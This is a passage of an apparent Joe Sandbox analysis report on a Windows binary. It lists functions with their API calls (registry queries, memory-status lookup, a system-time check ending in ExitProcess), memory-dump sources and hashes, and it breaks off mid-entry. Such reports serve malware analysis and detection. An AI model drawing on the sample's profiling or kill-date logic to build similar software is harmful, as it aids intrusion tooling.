                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: adab836d76edac1253be9db34d41a62021e8e499557ee36ef133477fded7b5dd
                                • Instruction ID: a1c66d7bb97d879abbc9b4f725cea548fb9c66f05f2a72b949339b8fd1e91bc9
                                • Opcode Fuzzy Hash: adab836d76edac1253be9db34d41a62021e8e499557ee36ef133477fded7b5dd
                                • Instruction Fuzzy Hash: 0F418171B005199FCF18DF68C995ABEBBB5EB89310F15822AEA09E7344D6349D008B94
                                Function 004E7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7D58
                                  • Part of subcall function 004FA1C0: std::exception::exception.LIBCMT ref: 004FA1D5
                                  • Part of subcall function 004FA1C0: std::exception::exception.LIBCMT ref: 004FA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 10461f46034b6d62815850247b13e2094b93bd1c161723aed091883be47d6fd3
                                • Instruction ID: 4edb9098ae554449c21ae9181ccc76283f0ded4595fb19e908646b9411e587d5
                                • Opcode Fuzzy Hash: 10461f46034b6d62815850247b13e2094b93bd1c161723aed091883be47d6fd3
                                • Instruction Fuzzy Hash: 1221D2323042448BD720DE6DDD80E3AB7E5EF92761B204A6FE5468B381D774D80087A9
                                Function 004F33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 004F3411
                                • wsprintfA.USER32 ref: 004F3437
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: e638ce93b675e3f4002abfd2735201be6a892d382c637a26a11fcded29db8407
                                • Instruction ID: dbbd32cf7424f16b9b45882fda4f88c0a7c6e8e4d5505f785d428af0a926f482
                                • Opcode Fuzzy Hash: e638ce93b675e3f4002abfd2735201be6a892d382c637a26a11fcded29db8407
                                • Instruction Fuzzy Hash: 8401B971A04218ABDB04DF98DC49B7EB778FB44711F004229FA05E7380DB7859008699
                                Function 004ED7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00CFE6A0,00000000,00020119,?), ref: 004ED7F5
                                • RegQueryValueExA.ADVAPI32(?,00CFF6D8,00000000,00000000,00000000,000000FF), ref: 004ED819
                                • RegCloseKey.ADVAPI32(?), ref: 004ED823
                                • lstrcat.KERNEL32(?,00000000), ref: 004ED848
                                • lstrcat.KERNEL32(?,00CFF6F0), ref: 004ED85C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 7cf95f73fb625111c4d3c0c4a84660d8756d2ea0744f8d4d00436f39a83cebc2
                                • Instruction ID: b3564f948076c032b7b391e7a95a164c1b5398304fda7b898a50f774f7cd9513
                                • Opcode Fuzzy Hash: 7cf95f73fb625111c4d3c0c4a84660d8756d2ea0744f8d4d00436f39a83cebc2
                                • Instruction Fuzzy Hash: 4141D370A1020CEBCB54EF65EC92BDE7374AF54308F40816AB90993351EE38AA45CF99
                                Function 004E7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E7F60
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E7FA5
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E7FD3
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E8007
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 62268080752ffeed06fd2cc50e80e42094432ea4e4af8053e41d662867916609
                                • Instruction ID: 81c458c474e0df888bb55caa1b9e9ca737cf22cd58a6e5e279ea42c3465409d0
                                • Opcode Fuzzy Hash: 62268080752ffeed06fd2cc50e80e42094432ea4e4af8053e41d662867916609
                                • Instruction Fuzzy Hash: DB41027060410ADFCB20DF69C480EAEB7B4FF18311F11458AE805DB351DB78EA62CB96
                                Function 004E8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E80EA
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E8102
                                • lstrlen.KERNEL32(00000000), ref: 004E8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E816F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 03b59256167ace5eb91ddead22ac479ea2d52c1be1e375799bc20b58a0e3e164
                                • Instruction ID: 792ba03a7300d0070394b1ad3d96088178593bcfd36decb7f535c7d1a38b02c8
                                • Opcode Fuzzy Hash: 03b59256167ace5eb91ddead22ac479ea2d52c1be1e375799bc20b58a0e3e164
                                • Instruction Fuzzy Hash: B8419871600206ABCB21DFAAD944BABBBF4EF44301F11815EA84997315EF38E942CB94
                                Function 004F1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 004F1B72
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F184F
                                  • Part of subcall function 004F1820: lstrlen.KERNEL32(00CE6D70), ref: 004F1860
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 004F1887
                                  • Part of subcall function 004F1820: lstrcat.KERNEL32(00000000,00000000), ref: 004F1892
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 004F18C1
                                  • Part of subcall function 004F1820: lstrlen.KERNEL32(00504FA0), ref: 004F18D3
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 004F18F4
                                  • Part of subcall function 004F1820: lstrcat.KERNEL32(00000000,00504FA0), ref: 004F1900
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 004F192F
                                • sscanf.NTDLL ref: 004F1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F1BC6
                                • ExitProcess.KERNEL32 ref: 004F1BE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: f98ed86af0d2ef4e53cd5de86c4ac76b8eb6b9f1d671378cd1c0283c1ee66509
                                • Instruction ID: a3ebe0f4dd1f60a1f4e38911b7d51b69b4ac1e0aa489125f582d7c278f53c4f4
                                • Opcode Fuzzy Hash: f98ed86af0d2ef4e53cd5de86c4ac76b8eb6b9f1d671378cd1c0283c1ee66509
                                • Instruction Fuzzy Hash: F621E6B1518301EF8350DF65D88496BBBF8EED8214F409A1EF599C3220E774E5048BA6
                                Function 004F3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F316D
                                • RegOpenKeyExA.ADVAPI32(80000002,00CEBC90,00000000,00020119,?), ref: 004F318C
                                • RegQueryValueExA.ADVAPI32(?,00CFE500,00000000,00000000,00000000,000000FF), ref: 004F31A7
                                • RegCloseKey.ADVAPI32(?), ref: 004F31B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: a97e27b86c32ca00ea1f37d95bd20e66d1d02d672eb7e7e134b075da65dbf236
                                • Instruction ID: bc40163744e159c7f15148d33047b62542ca8273bf6c543d63bf9ffb4b6c4df2
                                • Opcode Fuzzy Hash: a97e27b86c32ca00ea1f37d95bd20e66d1d02d672eb7e7e134b075da65dbf236
                                • Instruction Fuzzy Hash: F51130B6A40209EFD710DB94DD45BBBBBBCF748711F10821AFA0592680DB7959048BA5
                                Function 004F90DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 3dfc108bd2e9df2342744831c01a2c546819ef5132ed00fa28baec3386fb1fb9
                                • Instruction ID: 0572aaa568ef75f5140257e8b37efd771c7dd39f36f00ac8a100f482a2d9e466
                                • Opcode Fuzzy Hash: 3dfc108bd2e9df2342744831c01a2c546819ef5132ed00fa28baec3386fb1fb9
                                • Instruction Fuzzy Hash: F941297150075CAEEB318B258D85FFB7BFC9B45308F1448EDEA8686182D2799E45CF24
                                Function 004D8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004D8996
                                  • Part of subcall function 004FA1C0: std::exception::exception.LIBCMT ref: 004FA1D5
                                  • Part of subcall function 004FA1C0: std::exception::exception.LIBCMT ref: 004FA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 004D89CD
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: 726f91929fa6fc9e2f788cec3b4af8b494e06b40cf41829b0ed65cc92a85c674
